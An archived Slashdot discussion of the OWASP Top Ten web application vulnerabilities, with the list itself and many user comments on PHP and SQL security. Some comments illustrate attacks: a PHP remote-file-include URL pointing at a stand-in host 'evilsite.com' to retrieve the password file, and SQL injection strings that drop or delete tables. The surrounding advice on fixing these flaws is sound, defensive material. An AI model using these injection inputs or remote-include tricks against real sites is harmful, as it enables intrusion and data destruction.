Top 10 Vulnerabilities in Web Applications 229
sverrehu writes "The Open Web Application Security
Project (OWASP) has released a well-written document that is a
must read for every web programmer out there. This security document
is not about firewalls, encryption and patching. It's about common,
highly exploitable errors made by the application programmers. Pick
up your copy of "The Ten Most Critical Web Application Security
Vulnerabilities" from the OWASP web site."
Open Source Needs People to Reuse code (Score:5, Insightful)
Make open source more secure, share your experience, police each other, make M$ security look bad. When you make a security fix in code make sure you comment it - someone is probably going to copy it as an example. Don't let mistakes or inexperience spread.
Re:Open Source Needs People to Reuse code (Score:4, Insightful)
Most people write their own code because either
1: the interface to somone else code is clumsy.
2: They can't find the code there looking for
3: The codes poorly documented, both inters of design and API.
4: Because of the above potential hastles it's quicker.
As a good exmaple there are two UHCI implementations in the 2.4 kernel usb-uhci which has crap code but works and uhci which has nice code and doesn't work that well.
A lot of the functionality is re-implemented in the OHCI module (another USB protocol).
This has been fixed in 2.5 though (but not fully intergrated with things like usnfs yet).
Re:Open Source Needs People to Reuse code (Score:2)
Ack. ActiveX/COM on linux? Why in gods name would we want to use one of the most bastardized microsoft ideas EVER?
I'll be the first to agree with you code reuse is a very good thing, but COM is not the answer to that problem.
And yes, I have used COM. In Visual Basic and Visual C++. I've written COM objects in ATL in C++ (and VB, but everything is COM in VB). The main problem with COM is it comes close enough to being usable as to make it really frustrating.
Not to mention the way warped way you use COM objects in C++. Or threading issues. or about 4000 other thing wrong with it.
It has been a few years. Maybe it is better now.
Re:Open Source Needs People to Reuse code (Score:2, Insightful)
You can access it in many ways and when done well you can improve threading models.
I should have said com-like
KDE uses dcop, Mozilla uses XPCOM, and there Corba in Gnome.
COM(likes) provide a good interface definition model (with inheritance), and are quite easy to use. god knows what interfaces libgif, libpng, libjpeg etc... use, i hope it's the same.
Re:Open Source Needs People to Reuse code (Score:2)
You say that COM supports inheritance. I disagree.
According to google, the defininition of inheritance:
I would say that COM allows you to implement a COM interface, i.e. expose a defined set of methods, variables, etc... but true inheritence is one of those things it sorely lacks.
From http://www.chappellassoc.com/articles/article_Intr o_ActiveX.html [chappellassoc.com]
I guess you could argue the definition of inheritance all day, but, too me, from a practical everyday use, this is not 'inheritance' in the true OOP sense. While you can reuse a COM interface, you are still forced to rewrite the code behind the interface, even if you are just passing through to the original object you are attempting to extend.
Re:Open Source Needs People to Reuse code (Score:2)
Re:Open Source Needs People to Reuse code (Score:5, Informative)
a simple example of a bad include is
include($theme . "theme.php");
Basically is $theme isn't set then it uses some default theme, but alternate themese can be set in the url e.g.
webpage.php?theme=brushedmetal
now.....
the reason this can be dangerous is that php can include files across http urls so I could go to the page with a URL like
webpage.php?theme=http://evilsite.com/
and on evilsite.com have a theme.php file which does something like
So I get the password file spat back to me (obviously evilsite.com has to *not* run php otherwise you get the password file from evilsite.com).
Make sure you sanitise those path variables, and if you don't need it disable 'allow_url_fopen' to avoid offsite scripts being used but local files can still be manipulated. Also 'register_globals' stops the user specifying global variables which will also prevent this and other bugs
Re:Open Source Needs People to Reuse code (Score:3, Informative)
I.e. you can have registered globals on, just make sure you don't have any unset variables.
This is much more easily fixed if you just have registered globals off, then everything is in the $_GET, $_POST, and $_SESSION, etc arrays.
Re:Open Source Needs People to Reuse code (Score:3, Informative)
phpBB 1 & 2,W-Agora,Active PHP Bookmarks,PHP Nuke, phpWebSite,phpshare,phpReactor......
It's all very well for you to act all knowledgeable, classify this as a sillly misytake and look down on those people making it - but that doesn't help make any software more secure - get out ther and educate people.
Re:Open Source Needs People to Reuse code (Score:2)
Heh you just solved a mystery for me. I hang out at a 3D art forum that is visisted by both ameteurs and professionals. One guy (who owns a studio) played an interesting prank on us. He linked to Microsoft's site which had a press release about how his studio was bought by MS to make XBOX games.
He fessed up later that it was a hoax, but I didn't understand how he did it until I read what you said.
Ha that's funnny. Now I haveta look over my PHP code...
It's a mindset (Score:3, Insightful)
It's really a matter of mindset and habit. It's an easy problem to avoid if you get to the point where a little flag goes off in your head every time you see an unchecked variable passed to a function that accesses files (i.e. include(), fopen()).
Re:Open Source Needs People to Reuse code (Score:3, Insightful)
Even though PHP doesn't enforce it, it is always good practice to initialize your variables in any language. That stops the URL-based attack cold (though register_globals can help you remember the namepaces of your variables).
Re:Open Source Needs People to Reuse code (Score:5, Interesting)
I've emailed several people notifying them of this problem but not one single person changed their code.
Re:Open Source Needs People to Reuse code (Score:4, Interesting)
Re:Open Source Needs People to Reuse code (Score:2, Insightful)
An even better solution is to configure Apache via httpd.conf or .htaccess not to serve those files. I am meticulous about deleting backup (.php~) files, and Apache is configured to return 403 Forbidden on *.inc. Even if you know the names of my include files, you cannot view them. This is a better solution than instructing Apache to parse them as PHP. You'll wind up with a broken page that way.
The beauty of configuring Apache to disallow these files is PHP can still access them locally, but any remote script or browser will not be able to use them.
Re:Open Source Needs People to Reuse code (Score:2)
Order allow,deny
Deny from all
</Files>
<FilesMatch "\.php~$"> if you want to be more modern. Note that the stand alone ~ turns on regular expressions, and has nothing to do with matching ~s in file names.
It's almost certain you apache configuration has a similar rule for
Of course you might want to be more restrictive than just
Substitute for
Re:Open Source Needs People to Reuse code (Score:2)
I've been able to see several people's
Summary (Score:5, Insightful)
Re:Summary (Score:3, Flamebait)
While this is stuff that matters, it certainly isn't news. Folks have been making the same sloppy mistakes and careless oversights since AOL was trading at $140/share. (And that's a long time ago.)
I cringe whenever I hear someone go on about how easy ecommerce is. Yeah, easy to screw up.
Re:Summary (Score:5, Interesting)
I'm gonna haveta defend Slashdot here. It may not be news, but
Just because it's not a new topic doesn't mean it's not new to some people. Frankly, I'd rather read old articles like this than the usual finger pointing at Microsoft.
Re:Summary (Score:2)
"While this is stuff that matters, it certainly isn't news. Folks have been making the same sloppy mistakes and careless oversights since AOL was trading at $140/share. (And that's a long time ago.)"
That was not meant as a swipe at /. or OWASP. Although these issue have been around for a while, they certainly are still issues, and there are many admins who (for some reason) don't take even the most basic steps to secure thier servers.
For some of the scripting vulnerabilities, while the solutions are generally simple, they may not be obvious.
However, web sites are still open to attacks 6 months after the vendor posts the hotfix or security patch. Some people make an honest mistake; some people just aren't trying.
Re:Summary (Score:2)
But I'll admit I do have register_globals turned off. Some doors you just can't imagine leaving wide open.
Re:Summary (Score:2, Insightful)
Don't hear too much about anyone using these 'sploits, and they've been around forever. Anyone out there running a PHP site been whacked around this way?
I run two sites with PHP and to test security, I use a few common sense computer science techniques:
Security is not something that you can rely on other people to do for you: you will be let down. No matter how secure the tools are, you need to check things yourself.
Re:Summary (Score:2)
curl [curl.haxx.se]
Re:Summary (Score:2)
Never tried telnet?
Re:Summary (Score:2)
The simplest way 'round that is to save the page, rewire relative urls to point to original server and then misconfigure those posts to your hearts content and run the page off your own box....
It's devastatingly effective (I've tested this on a few boxes to play silly pranks like getting a box to output a photo and changing the name on the photo to "Real ugly!" Ie showmug.php?photo=bill.jpg&name=Real%20Ugly!!! ! (but in post format).. All too easy sadly enuff.
And of course, the obvious .... (Score:5, Funny)
Re:Summary (Score:5, Insightful)
Re:Summary (Score:2)
That theory didn't last long with her as I pointed out the flaws.
That said, the client side form checking is a useful tool, as it saves the incorrect data being sent and thus (a) saves the user time and (b) saves server-side CPU. Client side checking is optional, but desirable; server-side checking is mandatory.
Ooh!!! Ooh!!! (Score:2)
(Translation of the above: "Top Ten" is an inappropriate name for a list of bad things.)
Re:Summary (Score:4, Interesting)
I found a small software vendor who included the price in the URL of theproduct you are ordering. I was able to modify the prices in the shopping cart at will, of course I did not try to exploit that, but I e-mailed both the vendor and the people who made the shopping cart.
Neother seemed particularly concerned. The vendor responded that all orders are eyeballed by people, problems wouldn't occur. I suppose if you changed all the prices to 1 cent, sure. But what if you just gave yourself a nice little discount?
The fact of the matter is that a lot of developers (and even users) don't seem really concerned (at least until someone screws them over...).
Re:Summary (Score:2)
In itself it is not - but it's certainly not a setup I'd recommend.
I have seen db's out, unprotected on the internet - they're just asking for somebody to try bruteforcing passwords.
(Especially given that this typically won't be logged in the same way that ssh/ftp bruteforcing attempts would be).
Re:Summary (Score:2)
Then shudder at the cosmic stupidity of a world of random roadkill.
Did you read that press release??!!?? (Score:5, Funny)
This is news? (Score:4, Insightful)
The real problem is lack of time to properly test code. Somehow in modern businesses, very little time is allocated to GOOD, extensive, useful testing for vulnerablities in apps.
Re:This is news? (Score:3, Insightful)
Nice Start (Score:3, Interesting)
Re:Nice Start (Score:2, Insightful)
Re:Nice Start (Score:2)
"I'm forming a team to identify dead weight in this company. Any volunteers?"
Re:Nice Start (Score:2, Interesting)
Of course it confuses things by having been written before this list was published...time-travel can be so damn confusing sometimes
Re:Nice Start (Score:3, Insightful)
A Study in Scarlet [securereality.com.au]
It was written with PHP 4.0.something in mind, but a lot of the stuff can still be applied to the latest versions out there.
The Biggest Issue (Score:2, Insightful)
Re:The Biggest Issue (Score:3, Insightful)
#11 (Score:3, Funny)
quick reminder.. (Score:5, Insightful)
This security document is not about firewalls, encryption and patching. It's about common, highly exploitable errors made by the application programmers.
which means every post thats about IIS, Micro$oft, m$, microshaft and god knows what other words you use to make you look like an idiotic open source fanatic with no sense of reality are offtopic.
Already bogging down, here's the text... (Score:3, Informative)
Using this list, organizations can send a message to web site developers that "we want you to make sure that you won't make these mistakes." The security issues raised here are not new. In fact, some have been well understood for decades. Yet for some reason, major software development projects are still making these mistakes and jeopardizing not only their customers' security, but also the security of the entire Internet. You can download the entire report in PDF format here
Top Vulnerabilities in Web Applications
A1
Unvalidated Parameters
Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack backside components through a web application.
A2
Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions.
A3
Broken Account and Session Management
Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.
A4
Cross-Site Scripting (XSS) Flaws
The web application can be used as a mechanism to transport an attack to an end user's browser. A successful attack can disclose the end user's session token, attack the local machine, or spoof content to fool the user.
A5
Buffer Overflows
Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process. These components can include CGI, libraries, drivers, and web application server components.
A6
Command Injection Flaws
Web applications pass parameters when they access external systems or the local operating system. If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.
A7
Error Handling Problems
Error conditions that occur during normal operation are not handled properly. If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.
A8
Insecure Use of Cryptography
Web applications frequently use cryptographic functions to protect information and credentials. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.
A9
Remote Administration Flaws
Many web applications allow administrators to access the site using a web interface. If these administrative functions are not very carefully protected, an attacker can gain full access to all aspects of a site.
A10
Web and Application Server Misconfiguration
Having a strong server configuration standard is critical to a secure web application. These servers have many configuration options that affect security and are not secure out of the box.
Press Release
Washington, D.C. -- A new report detailing the ten most critical web application security problems was unveiled today by the Open Web Application Security Project. OWASP is dedicated to helping organizations understand and improve the security of their web applications and web services. Download the report from the OWASP website at http://www.owasp.org.
"The OWASP Top Ten list shines a spotlight directly on one of the most serious and often overlooked risks facing government and commercial organizations," said Jeffrey Williams, CEO of web application security firm Aspect Security. "A stunning number of organizations spend big bucks securing the network and somehow forget about the applications."
These flaws are surprisingly common and can be exploited by unsophisticated attackers with easily available tools. When an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Therefore, web application code is part of the security perimeter and cannot be ignored.
"This list is an important development for consumers and vendors alike," said Stephen Christey, Mitre CVE editor. "It will educate vendors to avoid the same mistakes that have been repeated countless times in other web applications. But it also gives consumers a way of asking vendors to follow a minimum set of expectations for web application security and, just as importantly, to identify which vendors are not living up to those expectations"
"This 'Ten-Most-Wanting' List acutely scratches at the tip of an enormous iceberg," said Peter G. Neumann, moderator of the ACM Risks Forum. "The underlying reality is shameful: most system and Web application software is written oblivious to security principles, software engineering, operational implications, and indeed common sense."
The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteer experts from across the world. Project chair Mark Curphey said, "the OWASP Top Ten Project was formed to capture our collective wisdom and present it in a way that would bring the attention web application security deserves."
Questions or comments about the OWASP Top Ten should be sent to: topten@owasp.org
Wait just a minute! (Score:4, Funny)
Direct link to report (Score:2, Informative)
Post Parameters (Score:4, Interesting)
This seems to be a moving target, though with the first vendor or platform that jumps to mind regarding vulnerabilities is a given. I'd say the root class is MicrosoftVulnerability and subclasses are Windows, Explorer, Outlook, Office, etc, all of which should be behind a firewall and virus/worm filters. Exposing an MS workstation to the internet is asking for it. However...
On unixes (including BSD and Linux) there's been the danger of unexpected post commands on webservers, directory access, etc. When I coded a perl search engine, years ago I found I had to absolutely lock down what was accepted as parameters and subsequent values. Frequenly processes ran with root authority, to access all resources. Granted this was probably the fault of the admin, not wanting to devote time and effort to make all necessary resources available to a special account for scripts to run in. Does this hold true today? (Obviously directories are still frequently available, even on CNN :o)
Buffy Overflows? Fuel Injection Flaws? (Score:3, Funny)
Though I would like to see Buffy overflow every now and then.
Not exactly new news (Score:3, Insightful)
I can't really get worked up over this announcement, what can I say?
Re:Not exactly new news (Score:2)
Missing (Score:5, Funny)
In spite of many alarming examples, the danger associated with having a link to your web site posted on the Slashdot front page continues to be underestimated by many developers of web applications. Neglect of this threat can cause your web server to actually burn through the floor of your computer building in a manner similar to nuclear meltdown.
Relevant to everything: (Score:5, Insightful)
I think a lack of common sense is a problem which applies to almost everything. Judges, certain chip-manufacturing companies, certain companies preventing sales of their better (*cough*alpha*cough*) products, etc, all seem to suffer from this affliction.
Another facet which the article may have neglected to mention is programmers who feel that they're better than the rest of their fellow programmers and so as a result they 'assume' that their software is inherently bug free, because obviously they could never write a buggy applcation.
In the recent case of HP and the Alpha, it seems as though both conceit ('our new chips are better', while quietly ignoring the facts) and a lack of common sense ('hey, how bout we not sell our better and more lucrative product, cuz thatll be fun!') and a dose of good ol' fashioned stupidity are involved...
Lack of common sense, conceit, and stupidity.. While the specifics of this article are clearly about web design, the overall lessons to be learned can, and should, be applied to technology, and life in general.
It's about time common sense became a bit more deserving of the title, and maybe once that happens we won't have to read articles like this one.
a "a must read"? (Score:5, Insightful)
It seems like good information and it's well-written, but it's hardly anything ground breaking.
Re:a "a must read"? (Score:2, Insightful)
Re:a "a must read"? (Score:5, Insightful)
I used to spend some late evenings looking for symptomes of SQL Injection and Cross-site Scripting (two of the vulnerabilities most easily detected from the outside without doing something really intrusive). I have a list of 170 sites, including banks and web shops that have symptoms on these problems. That's about half of the sites I've checked.
I've skimmed book upon book on "building E-commerce solutions", and every single one of them contains examples with unintended security holes in them. Even books on web application security contains examples that are vulnerable.
So, I strongly disagree with you. In my experience, most web application programmers know next to nothing about these problems.
READ THE PDF! (Score:5, Insightful)
Papers on web security (Score:3, Interesting)
www.cgisecurity.com/lib [cgisecurity.com]
Top 10? How about just 2 (Score:3, Interesting)
Crappy Code - Some of the people that are writting applications today either never learned about security or just don't care. This spans both the closed and open source world (there are examples in both).
Bad Configuration - How many times do we hear about Joe (no offense if your name is Joe and you are an admin) admin configure a webserver (or application) and leave some huge wide open hole because they either couldn't understand the directions in the README or never bothered to look. Then they whine about it when they get 0wn3d
Re:Top 10? How about just 2 (Score:2)
I guess you are also a perfect syadmin who is omnipresent and capable of keeping up with the mailing lists or news pages of Windows, Linux-Kernel, PHP, Apache, IIS, Perl, FreeBSD, Bind, Solaris, AIX, Oracle, MySQL, Postgres, GNU Utilities, ColdFusion and LDAP.
I suppose while keeping track of those products, your omnipresence also allows you to be aware of undocumented security holes. And once you are aware of those holes, you never run into patch conflicts that break your apps.
Maybe you should get a clue or STFU. "Security" goes beyond reading READMEs.
Re:Top 10? How about just 2 (Score:2)
If you maintain the code for any complex software, you cannot simply start making changes willy-nilly to fix things that may or may not be broken. Buffer overflows are not always obvious and fixing them may involve signifigant debugging across the app.
Human or "soft" issues factor in as well. Checking out a huge swath of code to hunt for bugs that may or may not be there will hold up everyone else's work for days. The cost of automated tools to find bugs may be out of the reach of some shops.
Security goes alot deeper than running servers as root. The heart of computing is not code, but procedure and standards. The only way to improve the quality of code in general, and security in particular is to simplify, standardize, and avoid jumping on the next bandwagon.
Re:Top 10? How about just 2 (Score:2)
What I found: Zero interest in getting involved in the community. Anything that he built in one night was "cool". Waiting until the last minute was "just how the job was" and finally he actually admitted "you could probably access most of my stuff by passing the correct parameters but no one knows about that and the stuff works."
(And upon sitting down with a couple of the site he had done it literally took me five minutes to break the so called "security" on.)
The problem is complacency more than anything else. The pointy-haired bosses of the world see that it works or doesn't work. And that makes the job harder for those of us who want to do it right in the first place. (i.e. why does it take longer for you to do the same thing).
Fortunatly in my case the errors were so bad that I was able to show them off to my bosses who promptly told me to fix them as quickly as possible. But i know not everyone has such understanding bosses.
The forgot a very big one... (Score:5, Interesting)
-Application allows user to upload a file (attachment, image, etc) somewhere into the webroot.
-Instead of sending a
-User uploads "mail_me_your_sources.php", or similar
-This upload becomes executable, user has control of server
S
Re:The forgot a very big one... (Score:4, Informative)
No. Turns out we were stashing user-uploaded files as blobs in the DB, not as actual files in the webroot. If someone uploaded a PHP file, and then tried to view it, the server would set Content-Type as a JPG image, and the user would probably either see garbage or the actual PHP source.
Re:The forgot a very big one... (Score:2, Informative)
Another problem with this - make sure that if you need uploads, that you filter out all
Re:The forgot a very big one... (Score:2)
A lot of developers will allow the writing of images (avatars, logos, etc) to the web accessible directory, and reference those images in HTML. The solution IS, however, in configuration (tell apache to not process php files in a certain directory), or limit the possible filenames of uploaded files.
S
Re:The forgot a very big one... (Score:2)
For those using Perl and SQL.. (Score:2, Informative)
(Actually, I have no idea who did the DB stuff. The point is, use $dbh->quote(), damnit.)
Re:For those using Perl and SQL.. (Score:3, Informative)
Plus you can re-use the same prepared statement for different parameters by simply execute()ing with a different bind parameter each time. Saves time on databases with real prepared statements.
Here's an Example (Score:5, Informative)
UPDATE forum
SET comment = form.comment
WHERE messageID = form.messageID
Do you see the error there? I can edit the form to send a different messageID and change any comment I want. The solution?
WHERE messageID = form.messageID AND userID = cookie.userID
Because HTML is stateless, you have to authenticate the user on every hit and use that authenticated identity as part of every database action. How you do that is a subject unto itself!
At any rate, I just wanted to show how easy it is to introduce a serious security flaw into a web application. The only countermeasure is competent, careful coding.
Re:Here's an Example (Score:3, Informative)
SET comment = form.comment
WHERE messageID = form.messageID
To reiterate the 'injection' bug: insead of form.messageID being comthing sane like #1212, nasy people could return (DELETE * FROM Users). This then gets evaluated by your SQL database if you're not carefull.
Re:Here's an Example (Score:2)
In there I could then put "47; drop table users; commit;"
This would execute
UPDATE forum
SET comment = "blablabla"
WHERE messageID = "47"
drop table users;
commit;
If form data parser can't handle this, you're in trouble.
Re:Here's an Example (Score:2, Informative)
UPDATE forum
SET comment = ?
WHERE messageID = ?
And then use your DBI to set the values of the '?'s. This also helps DB performance, because the DB can cache the compliled SQL to use again.
I'm not sure PHP has preparied statments, but it should.
Or: sign state cryptographically (Score:2)
However, not all state can be validated in this way, and even when it can, it may not be practical to design validation tests for each and every item of state that can be received from the client.
Another approach is to cryptographically sign each package of state that the server hands to the client and then test that the signature is valid when the client returns the package to the server with a future request. This eliminates the need to use session state (which may not be possible in some apps) and also eliminates the need for item-by-item validation tests.
Re:Here's an Example (Score:5, Insightful)
Yeah, it's a good thing users can't edit the cookies that are stored on their hard disk..... oh wait.
To do something like this securely, give the user a unique session ID and put only that in the cookie. Then manage all their session data on the server side. That's what PHP does.
Re:Here's an Example (Score:3, Informative)
Re:Here's an Example (Score:2)
How to do it, and how to protect against it... (Score:4, Informative)
isn't this old news? (Score:3, Informative)
The Cross Site Scripting FAQ (Score:2, Informative)
XSS FAQ [cgisecurity.com]
It should also be noted OWASP RIPPED some of the content and DID NOT QUOTE it properly. Search for "What can I do to protect myself as a vendor?" in the FAQ and then search for XSS solutions in the owasp paper. Hrm seem familiar?
Well known, but not easy to do . . . . (Score:5, Insightful)
While the list is (appropriately) in OS-neutral and scripting language-neutral terms, the way to correct these problems is specific to the OS, webserver and scripting langauge you are using. So the next question is: what are the resources for addressing these issues, specifically, for particular OSes, webservers and languages?
For those taking the MS approach (and flame it if you want, but IIS isn't about to stop being the #2 web server overnight, so it might as well be done as securely as possible), I can recommend the following two guides from SANS:
Securing Internet Information Server [sans.org]
and
Windows 2000/XP Scripting For Security [sans.org]
These are listed as "course books" on their site, but they stand alone as guides for those who already have some background and knowledge. And if you don't have much background and knowledge, SANS courses are very good. (In fact, just about everything at the SANS website [sans.org] is valuable for the IT professional who wants to know more about security -- which ought to be all of us.)
So, stop just posting that these 10 problems are old news, and post the resources you use (or learned from) to avoid these problems yourself on your platform of choice, so the many (majority?) still making these mistakes can learn to avoid them too.
Re:Well known, but not easy to do . . . . (Score:2, Informative)
I think the next wave of viruses... (Score:3, Insightful)
I don't think anyone has spent too much time looking for buffer overflows in the most common decoders for these filetypes; and I'm sure they exist.
As soon as someone figures out how to the Microsoft's LZW decompressor to overrrun its stack, or how to get a stack corruption in Adobe's Acrobat reader, it will be possible to spread viruses easily, becuase most people aren't afraid to open .GIF or .PDF files.
Re:I think the next wave of viruses... (Score:2)
Re:I think the next wave of viruses... (Score:2, Insightful)
Yeah, I'm sure.. Just like people stopped opening unknown executable attachments in their email.
Re:I think the next wave of viruses... (Score:2)
But remember he is referring to the program that opens the
11) Commonly used passwords (Score:2, Informative)
Re:11) Commonly used passwords (Score:2, Funny)
Buffer overflows (Score:2)
Buffer Overflows It seems to me that a lot of "overflow" type issues are often somewhat of a daemon/application problem. Yes, there are exploits that allow for users who don't do bounds checking etc and cause stupid issues, but a lot of these pop up as part of the application and end up being repaired in bugfixes. Even if you code safely and bounds check, an exploit in the daemon could get this one by you.
Oh... and also, *FOR GAWD SAKE* turn register_globals off. If you must have globals (maybe for a prewritten piece) then write a custom procedure that tags them in and paste it into said prewritten code... preferentially doing integrity checks first!
We come in peace, shoot to kill! - scorched earth
The problem: web programming is easy (Score:4, Insightful)
The truth is that it is easy to get something going on a website, but it is hard to get something that works well and is secure. The amount of time it takes to transform an interesting web demo to a well executed web application is staggering. It is also very hard to explain why all that time is needed. What happens is that web application get launched half-baked. If a company is lucky, the application will only annoy the users, if a company is unlucky, someone will walk right in through a common security hole and comprimise the whole application.
Moral to managers and project planners: believe your programmers when they tell you that there is more then meets the eye in developing web applications.
"Remember me" login option (Score:2, Interesting)
What is a good way to handle the (IMO required) ability for users to click a checkbox so they don't have to enter their login information all the time.
Yes, of course, any access to sensitive data should prompt for a password again even if they're logged in, and SSL is manadatory for some information.
also dangerous: (Score:4, Insightful)
if these files access databases or contain other passwords they're likely to be visible in the
-
same probmen if
Re:also dangerous: (Score:3, Informative)
# begin httpd.conf
#
#
#
# treat *.inc the same as *.php and life will
# be fuzzy and warm
AddType application/x-httpd-php
AddType application/x-httpd-php
#
#
#
# end httpd.conf
I imagine you could do something similar to deny access to
I use this (Score:2)
order allow,deny
deny from all
same thing for *.bak
This way the files can be included by php, but apache refuses to show the content.
Vulnerability number 0 (Score:2, Funny)
Dupe (Score:2)
New version of the document thou.
Vulnerability #12 (Score:5, Funny)
Re:Vulnerability #11 (Score:5, Funny)
P.S. They also like money!!
Welcome to Slashdot. A few pointers:
- When referring to The Evil Empire, please use '$' instead of 's'. This holds true even if your currency symbol happens to be different as we are USA centric here.
- When using operator overloading to make a point, please use C syntax, as C is the language of the 1337 h^x0r. The statement above is assigning bad to Micro[$]oft instead of testing for equality. Thus, the syntax should be Micro[$]oft == bad!. In most cases, syntactical errors like these will get you tagged as a BASIC programmer, which is a Bad Thing (TM)
- When using more than one exclamation sign at the end of a sentence related to Micro[$]oft, please use the normative money!!1! syntax by inserting a gratuitous 1 (one) character.
Other than that, please feel free to explore the site. Check out the journal features and keep that karma ticker open at all times.Thanks!
Re:My top 10 list (Score:5, Funny)
11. Buffer Overflooooooooooooooooooooooooooooooooooooooooooo
root#